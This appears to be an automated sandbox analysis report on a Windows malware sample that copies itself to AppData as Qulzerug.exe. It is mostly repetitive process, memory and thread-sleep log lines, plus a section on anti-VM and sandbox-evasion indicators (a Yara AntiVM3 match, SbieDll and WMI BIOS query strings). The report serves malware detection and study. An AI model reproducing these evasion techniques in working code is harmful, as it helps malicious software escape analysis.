Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Memory allocated: 2840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Memory allocated: 4840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Memory allocated: 6440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Memory allocated: 7440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Memory allocated: 1580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Memory allocated: 4F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 2930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 4AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 65A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 75A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 25F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 45F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 6010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 7010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 1610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 3360000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 1840000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 1020000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 2D50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Memory allocated: 10D0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Window / User API: threadDelayed 1634	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Window / User API: threadDelayed 4691	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Window / User API: threadDelayed 2332	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Window / User API: threadDelayed 7484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Window / User API: threadDelayed 1607	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Window / User API: threadDelayed 3786	Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7464	Thread sleep count: 1634 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7456	Thread sleep count: 4691 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -98891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -98779s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -98588s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -98484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -98375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -98266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -98156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -98047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -97937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -97718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -97606s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -97500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -97257s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -97156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -97047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -96935s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436	Thread sleep time: -96828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7392	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8124	Thread sleep count: 2332 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8124	Thread sleep count: 7484 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -99868s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -99719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -99610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -99485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -99360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -99235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -99101s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -98985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -98860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -98735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -98610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -98485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -98360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -98235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -98106s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -97889s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -97782s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -97657s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -97532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -97407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -97297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -97188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -97063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -96938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -96813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -96688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -96578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -96469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -96344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -96234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -96125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -96016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -95906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -95780s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -95672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -95563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -95438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -95313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -95203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -95094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -94969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -94860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -94736s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -94592s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -94485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096	Thread sleep time: -94375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 6956	Thread sleep count: 1607 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 6956	Thread sleep count: 3786 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -99874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -99656s >= -30000s	Jump to behavior
